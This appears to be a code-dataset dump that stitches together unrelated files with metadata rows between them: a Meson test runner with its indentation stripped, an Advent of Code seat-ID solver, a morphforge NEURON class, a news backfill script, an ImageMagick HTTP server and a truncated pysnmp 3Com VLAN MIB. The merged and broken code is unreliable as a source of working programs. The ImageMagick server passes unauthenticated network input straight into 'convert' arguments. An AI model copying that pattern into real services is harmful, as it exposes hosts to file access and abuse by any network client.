returncode = p.returncode
return TestRun(res, returncode, duration, stdo, stde, cmd)
def print_stats(numlen, tests, name, result, i, logfile, jsonlogfile):
startpad = ' '*(numlen - len('%d' % (i+1)))
num = '%s%d/%d' % (startpad, i+1, len(tests))
padding1 = ' '*(38-len(name))
padding2 = ' '*(8-len(result.res))
result_str = '%s %s %s%s%s%5.2f s' % \
(num, name, padding1, result.res, padding2, result.duration)
print(result_str)
write_log(logfile, name, result_str, result)
write_json_log(jsonlogfile, name, result)
def drain_futures(futures):
for i in futures:
(result, numlen, tests, name, i, logfile, jsonlogfile) = i
print_stats(numlen, tests, name, result.result(), i, logfile, jsonlogfile)
def filter_tests(suite, tests):
if suite is None:
return tests
return [x for x in tests if suite in x.suite]
def run_tests(options, datafilename):
logfile_base = 'meson-logs/testlog'
if options.wrapper is None:
wrap = []
logfilename = logfile_base + '.txt'
jsonlogfilename = logfile_base+ '.json'
else:
wrap = [options.wrapper]
logfilename = logfile_base + '-' + options.wrapper.replace(' ', '_') + '.txt'
jsonlogfilename = logfile_base + '-' + options.wrapper.replace(' ', '_') + '.json'
logfile = open(logfilename, 'w')
jsonlogfile = open(jsonlogfilename, 'w')
logfile.write('Log of Meson test suite run on %s.\n\n' % datetime.datetime.now().isoformat())
tests = pickle.load(open(datafilename, 'rb'))
if len(tests) == 0:
print('No tests defined.')
return
numlen = len('%d' % len(tests))
varname = 'MESON_TESTTHREADS'
if varname in os.environ:
try:
num_workers = int(os.environ[varname])
except ValueError:
print('Invalid value in %s, using 1 thread.' % varname)
num_workers = 1
else:
num_workers = multiprocessing.cpu_count()
executor = conc.ThreadPoolExecutor(max_workers=num_workers)
futures = []
filtered_tests = filter_tests(options.suite, tests)
for i, test in enumerate(filtered_tests):
if test.suite[0] == '':
visible_name = test.name
else:
if options.suite is not None:
visible_name = options.suite + ' / ' + test.name
else:
visible_name = test.suite[0] + ' / ' + test.name
if not test.is_parallel:
drain_futures(futures)
futures = []
res = run_single_test(wrap, test)
print_stats(numlen, filtered_tests, visible_name, res, i, logfile, jsonlogfile)
else:
f = executor.submit(run_single_test, wrap, test)
futures.append((f, numlen, filtered_tests, visible_name, i, logfile, jsonlogfile))
drain_futures(futures)
return logfilename
def run(args):
global tests_failed
options = parser.parse_args(args)
if len(options.args) != 1:
print('Test runner for Meson. Do not run on your own, mmm\'kay?')
print('%s [data file]' % sys.argv[0])
if options.wd is not None:
os.chdir(options.wd)
datafile = options.args[0]
logfilename = run_tests(options, datafile)
returncode = 0
if len(tests_failed) > 0:
print('\nOutput of failed tests (max 10):')
for (name, stdo, stde) in tests_failed[:10]:
print("{} stdout:\n".format(name))
print(stdo)
print('\n{} stderr:\n'.format(name))
print(stde)
print('\n')
returncode = 1
print('\nFull log written to %s.' % logfilename)
return returncode
if __name__ == '__main__':
sys.exit(run(sys.argv[1:]))
| 36.28821
| 97
| 0.601685
| 250
| 0.030084
| 0
| 0
| 0
| 0
| 0
| 0
| 1,626
| 0.195668
|
77592dd99f28334c1a356341edde3b576368b416
| 1,085
|
py
|
Python
|
2020/d05_1.py
|
PaulWichser/adventofcode
|
628d962a65188310af136c8b88acbdbd5dc94352
|
[
"MIT"
] | null | null | null |
2020/d05_1.py
|
PaulWichser/adventofcode
|
628d962a65188310af136c8b88acbdbd5dc94352
|
[
"MIT"
] | null | null | null |
2020/d05_1.py
|
PaulWichser/adventofcode
|
628d962a65188310af136c8b88acbdbd5dc94352
|
[
"MIT"
] | null | null | null |
import fileimp
# divide rows 0-127
# F = lower half
# B = upper half
# divide columns 0-7
# R = upper half
# L = lower half
# seat ID = row * 8 + col
# list of IDs
# max list
def idcalc(list):
seats = []
for i in list:
row = ''
col = ''
for j in i:
if j == 'F':
row = row + '0'
elif j == 'B':
row = row + '1'
elif j == 'R':
col = col + '1'
elif j == 'L':
col = col + '0'
else:
print("something went wrong in rows & cols")
quit()
print(row, col)
# row = row[::-1]
# col = col[::-1]
print(row, col)
row = int(row, 2)
col = int(col, 2)
print(row, col)
seats.append((row * 8) + col)
print(seats)
return seats
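# Worked example (sketch), using the well-known boarding pass "FBFBBFFRLR":
# row "0101100" -> 44, column "101" -> 5, seat ID = 44 * 8 + 5 = 357, so
# idcalc(["FBFBBFFRLR"]) returns [357] (printing its debug output along the way).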
testlist = fileimp.listimp("d05_test.txt")
if max(idcalc(testlist)) != 820:
print("Test Failed!")
quit()
seatlist = fileimp.listimp("d05_input.txt")
print("Largest seat ID = ", max(idcalc(seatlist)))
| 22.604167
| 60
| 0.453456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 321
| 0.295853
|
7759ab5bb6b2419c0cf09ba0f8c0454651c021e4
| 3,618
|
py
|
Python
|
src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py
|
mikehulluk/morphforge
|
2a95096f144ed4ea487decb735ce66706357d3c7
|
[
"BSD-2-Clause"
] | 1
|
2021-01-21T11:31:59.000Z
|
2021-01-21T11:31:59.000Z
|
src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py
|
mikehulluk/morphforge
|
2a95096f144ed4ea487decb735ce66706357d3c7
|
[
"BSD-2-Clause"
] | null | null | null |
src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py
|
mikehulluk/morphforge
|
2a95096f144ed4ea487decb735ce66706357d3c7
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.core import PluginDict
from morphforge.simulation.base import SimulationEnvironment
from morphforge.simulation.base import CurrentClampStepChange
from morphforge.simulation.base import VoltageClampStepChange
from morphforge.simulation.neuron.core import NEURONSimulationSettings
from morphforge.simulation.neuron.networks import NEURONGapJunction
from morphforge.simulation.neuron.core import NEURONCell
from morphforge.simulation.neuron.core import NEURONSimulation
class NEURONEnvironment(SimulationEnvironment):
_env_name = "NEURON"
def Simulation(self, **kwargs):
return NEURONSimulation(environment=self, **kwargs)
def Cell(self, **kwargs):
return NEURONCell(**kwargs)
def SimulationSettings(self, **kwargs):
return NEURONSimulationSettings(**kwargs)
channels = PluginDict()
presynapticmechanisms = PluginDict()
synapse_psm_template_type = PluginDict()
currentclamps = PluginDict()
voltageclamps = PluginDict()
@classmethod
def Channel(cls, chltype, **kwargs):
chl = cls.channels.get_plugin(chltype)
return chl(**kwargs)
@classmethod
def SynapticTrigger(cls, triggertype, **kwargs):
trigger_functor = cls.presynapticmechanisms.get_plugin(triggertype)
return trigger_functor(**kwargs)
def PostSynapticMechTemplate(self, psm_type, **kwargs):
tmpl_functor = self.synapse_psm_template_type.get_plugin(psm_type)
return tmpl_functor(**kwargs)
def CurrentClamp(self, protocol=CurrentClampStepChange, **kwargs):
current_clamp = self.currentclamps.get_plugin(protocol)
return current_clamp(**kwargs)
def VoltageClamp(self, protocol=VoltageClampStepChange, **kwargs):
voltage_clamp = self.voltageclamps.get_plugin(protocol)
return voltage_clamp(**kwargs)
def GapJunction(self, **kwargs):
return NEURONGapJunction(**kwargs)
def Synapse(self, **kwargs):
from morphforge.simulation.neuron.networks import NEURONSynapse
return NEURONSynapse(**kwargs)
| 37.6875
| 75
| 0.725263
| 1,589
| 0.439193
| 0
| 0
| 311
| 0.085959
| 0
| 0
| 1,516
| 0.419016
|
775a75fe1fae66dbea733bd14ae845c43584999a
| 766
|
py
|
Python
|
news_topic_modeling_service/backfill.py
|
rishavgiri6/News4U
|
d426eba97039a3d1afd90ecd14c454856b91f9d8
|
[
"Unlicense"
] | 2
|
2021-08-02T09:41:42.000Z
|
2021-08-10T05:26:52.000Z
|
news_topic_modeling_service/backfill.py
|
rishavgiri6/News4U
|
d426eba97039a3d1afd90ecd14c454856b91f9d8
|
[
"Unlicense"
] | null | null | null |
news_topic_modeling_service/backfill.py
|
rishavgiri6/News4U
|
d426eba97039a3d1afd90ecd14c454856b91f9d8
|
[
"Unlicense"
] | null | null | null |
import os
import sys
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import mongodb_client
import news_topic_modeling_service_client
if __name__ == '__main__':
db = mongodb_client.get_db()
cursor = db['news'].find({})
count = 0
for news in cursor:
count += 1
print(count)
if 'class' in news:
print('Populating classes...')
description = news['description']
if description is None:
description = news['title']
topic = news_topic_modeling_service_client.classify(description)
news['class'] = topic
db['news'].replace_one({'digest': news['digest']}, news, upsert=True)
| 30.64
| 81
| 0.620104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 150
| 0.195822
|
775cbe05f1e23d8b5ab980d33a068bbf4e214d9f
| 2,559
|
py
|
Python
|
server/imagemagick-server/server.py
|
brygga-dev/workdir2
|
0b6e8f54a3d44ef8dedefd1bdc95f193467d239e
|
[
"MIT"
] | null | null | null |
server/imagemagick-server/server.py
|
brygga-dev/workdir2
|
0b6e8f54a3d44ef8dedefd1bdc95f193467d239e
|
[
"MIT"
] | null | null | null |
server/imagemagick-server/server.py
|
brygga-dev/workdir2
|
0b6e8f54a3d44ef8dedefd1bdc95f193467d239e
|
[
"MIT"
] | null | null | null |
from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: these should probably have limited
# access to files, so restricting access to only
# the uploads dir may be good.
# Then there is a slight problem with the possibility of
# optimizing theme files, for example (which should be
# done first, but it'd be convenient to reuse this).
# Maybe allow to mount a theme path
# Collecting args, stripping quotes string for
# it to work with subprocess.Popen
# Assuming only single quoted strings
def append_args(cmd_list, cmd_args):
in_string = False
accum = ""
for i in range(0, len(cmd_args) - 1):
char = cmd_args[i]
if (in_string):
if (char == "'"):
cmd_list.append(accum)
accum = ""
in_string = False
else:
accum = accum + char
else:
if (char == " "):
if (accum != ""):
cmd_list.append(accum)
accum = ""
elif (accum == "" and char == "'"):
in_string = True
else:
accum = accum + char
if (accum != ""):
cmd_list.append(accum)
return cmd_list
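# Illustrative example (hypothetical request body; note the loop above stops one
# character early, so a trailing newline or space is expected):
#
#     append_args(["convert"], "in.png -resize '50% x50%' out.png\n")
#     # -> ["convert", "in.png", "-resize", "50% x50%", "out.png"]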
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
#subprocess.Popen(["ls", "-la", "/imgs"])
#subprocess.Popen(["id", "-u"])
#subprocess.Popen(["id", "-u", "-n"])
content_length = int(self.headers['Content-Length'])
cmd_args = self.rfile.read(content_length).decode('utf-8')
if len(cmd_args) > 0:
print(cmd_args)
cmd_list = append_args(["convert"], cmd_args)
print(cmd_list)
CmdOut = subprocess.Popen(cmd_list)
(stdout,stderr) = CmdOut.communicate()
print(stdout)
print(stderr)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("ok".encode('utf-8'))
#def log_message(self, format, *args):
# suppress logging per request
#return
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == '__main__':
print('Imagemagick server starts')
httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Imagemagick server stops')
| 30.831325
| 66
| 0.5932
| 945
| 0.369285
| 0
| 0
| 0
| 0
| 0
| 0
| 800
| 0.312622
|
775d1ff6bf052dcb5d8a678cb806eb618f0ebf92
| 26,692
|
py
|
Python
|
pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/GENERIC-3COM-VLAN-MIB-1-0-7.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module GENERIC-3COM-VLAN-MIB-1-0-7 (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GENERIC-3COM-VLAN-MIB-1-0-7
# Produced by pysmi-0.3.4 at Wed May 1 11:09:00 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
NotificationType, Counter32, Integer32, ObjectIdentity, Counter64, IpAddress, MibIdentifier, iso, ModuleIdentity, Unsigned32, Gauge32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "NotificationType", "Counter32", "Integer32", "ObjectIdentity", "Counter64", "IpAddress", "MibIdentifier", "iso", "ModuleIdentity", "Unsigned32", "Gauge32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "enterprises")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
class RowStatus(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))
namedValues = NamedValues(("active", 1), ("notInService", 2), ("notReady", 3), ("createAndGo", 4), ("createAndWait", 5), ("destroy", 6))
a3Com = MibIdentifier((1, 3, 6, 1, 4, 1, 43))
generic = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10))
genExperimental = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1))
genVirtual = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14))
a3ComVlanGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1))
a3ComVlanProtocolsGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2))
a3ComVirtualGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3))
a3ComEncapsulationGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4))
class A3ComVlanType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20))
namedValues = NamedValues(("vlanLayer2", 1), ("vlanUnspecifiedProtocols", 2), ("vlanIPProtocol", 3), ("vlanIPXProtocol", 4), ("vlanAppleTalkProtocol", 5), ("vlanXNSProtocol", 6), ("vlanISOProtocol", 7), ("vlanDECNetProtocol", 8), ("vlanNetBIOSProtocol", 9), ("vlanSNAProtocol", 10), ("vlanVINESProtocol", 11), ("vlanX25Protocol", 12), ("vlanIGMPProtocol", 13), ("vlanSessionLayer", 14), ("vlanNetBeui", 15), ("vlanLayeredProtocols", 16), ("vlanIPXIIProtocol", 17), ("vlanIPX8022Protocol", 18), ("vlanIPX8023Protocol", 19), ("vlanIPX8022SNAPProtocol", 20))
class A3ComVlanLayer3Type(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13))
namedValues = NamedValues(("vlanIPProtocol", 1), ("vlanIPXProtocol", 2), ("vlanAppleTalkProtocol", 3), ("vlanXNSProtocol", 4), ("vlanSNAProtocol", 5), ("vlanDECNetProtocol", 6), ("vlanNetBIOSProtocol", 7), ("vlanVINESProtocol", 8), ("vlanX25Protocol", 9), ("vlanIPXIIProtocol", 10), ("vlanIPX8022Protocol", 11), ("vlanIPX8023Protocol", 12), ("vlanIPX8022SNAPProtocol", 13))
class A3ComVlanModeType(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("vlanUseDefault", 1), ("vlanOpen", 2), ("vlanClosed", 3))
a3ComVlanGlobalMappingTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1), )
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingTable.setDescription('This table lists VLAN interfaces that are globally identified. A single entry exists in this list for each VLAN interface in the system that is bound to a global identifier.')
a3ComVlanGlobalMappingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanGlobalMappingIdentifier"))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingEntry.setDescription('An individual VLAN interface global mapping entry. Entries in this table are created by setting the a3ComVlanIfGlobalIdentifier object in the a3ComVlanIfTable to a non-zero value.')
a3ComVlanGlobalMappingIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535)))
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIdentifier.setDescription('An index into the a3ComVlanGlobalMappingTable and an administratively assigned global VLAN identifier. The value of this object globally identifies the VLAN interface. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same.')
a3ComVlanGlobalMappingIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanGlobalMappingIfIndex.setDescription('The value of a3ComVlanIfIndex for the VLAN interface in the a3ComVlanIfTable, which is bound to the global identifier specified by this entry.')
a3ComVlanIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2), )
if mibBuilder.loadTexts: a3ComVlanIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfTable.setDescription('This table lists VLAN interfaces that exist within a device. A single entry exists in this list for each VLAN interface in the system. A VLAN interface may be created, destroyed and/or mapped to a globally identified vlan.')
a3ComVlanIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComVlanIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfEntry.setDescription('An individual VLAN interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfIndex.setDescription("The index value of this row and the vlan's ifIndex in the ifTable. The NMS obtains the index value for this row by reading the a3ComNextAvailableVirtIfIndex object.")
a3ComVlanIfDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfDescr.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfDescr.setDescription('This is a description of the VLAN interface.')
a3ComVlanIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 3), A3ComVlanType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfType.setDescription('The VLAN interface type.')
a3ComVlanIfGlobalIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setDescription('An administratively assigned global VLAN identifier. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same. The binding between a global identifier and a VLAN interface can be created or removed. To create a binding an NMS must write a non-zero value to this object. To delete a binding, the NMS must write a zero to this object.')
a3ComVlanIfInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 5), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanIfInfo.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfInfo.setDescription('A TLV encoded information string for the VLAN interface. The information contained within this string corresponds to VLAN information not contained within this table, but contained elsewhere within this MIB module. The purpose of this string is to provide an NMS with a quick read mechanism of all related VLAN interface information. The encoding rules are defined according to: tag = 2 bytes length = 2 bytes value = n bytes The following tags are defined: TAG OBJECT DESCRIPTION 1 a3ComIpVlanIpNetAddress IP Network Address of IP VLAN 2 a3ComIpVlanIpNetMask IP Network Mask of IP VLAN')
a3ComVlanIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 6), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptible to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the state of the row transitions to active(1), the agent creates the corresponding row in the ifTable.. Setting this object to destroy(6) will remove the corresponding VLAN interface, remove the entry in this table, and the corresponding entries in the a3ComVlanGlobalMappingTable and the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any stacking dependencies in the ifStackTable and any protocol specific tables dependencies.')
a3ComVlanIfModeType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 7), A3ComVlanModeType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfModeType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfModeType.setDescription(' The VLAN mode type for this interface. This object can be set to: usedefault(1) open(2) closed(3) UseDefault Vlans: uses the bridge Vlan Mode value. The bridge Vlan Mode Value can be set to : Open, Closed or Mixed. Open VLANs: have no requirements about relationship between the bridge port that a frame was received upon and the bridge port(s) that it is transmitted on. All open VLANs within the bridge will share the same address table. Closed VLANs: require that the bridge port that a frame is received on is the same VLAN interface as the bridge port(s) that a frame is transmitted on. Each closed VLAN within the bridge will have its own address table.')
a3ComIpVlanTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1), )
if mibBuilder.loadTexts: a3ComIpVlanTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanTable.setDescription('A list of IP VLAN interface information entries. Entries in this table are related to entries in the a3ComVlanIfTable by using the same index.')
a3ComIpVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComIpVlanEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanEntry.setDescription('A a3ComIpVlanEntry contains layer 3 information about a particular IP VLAN interface. Note entries in this table cannot be deleted until the entries in the ifStackTable that produce overlap are removed.')
a3ComIpVlanIpNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 1), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setDescription('The IP network number for the IP VLAN interface defined in the a3ComVlanIfTable identified with the same index. The IpNetAddress and the IpNetMask must be set and the row creation process completed by an NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanIpNetMask = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setDescription('The IP network mask corresponding to the IP Network address defined by a3ComIpVlanIpNetAddress. The IpNetAddress and the IpNetMask must be set and the row creation process completed by an NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanStatus.setDescription('The status column for this IP VLAN entry. This object can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptable to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the row creation request. Setting this object to createAndWait(5) causes a row in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptable to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the status changes to active(1), the agent applies the IP parameters to the IP VLAN interface identified by the corresponding value of the a3ComIpVlanIndex object. Setting this object to destroy(6) will remove the IP parameters from the IP VLAN interface and remove the entry from this table. Setting this object to destroy(6) will remove the layer 3 information from the IP VLAN interface and will remove the row from this table. Note that this action cannot be performed if there are ifStackTable entries that result in overlapping IP VLAN interfaces. Note that these dependencies must be removed first.')
a3ComVlanProtocolTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2), )
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setDescription('This table lists the configured protocols per Vlan. A single entry exists in this list for each protocol configured on a VLAN interface. The a3ComVlanIfType object in a3ComVlanIfTable has to be set to vlanLayeredProtocols in order to use this table.')
a3ComVlanProtocolEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIfIndex"), (0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIndex"))
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setDescription('A a3ComVlanProtocolEntry contains a single VLAN to protocol entry.')
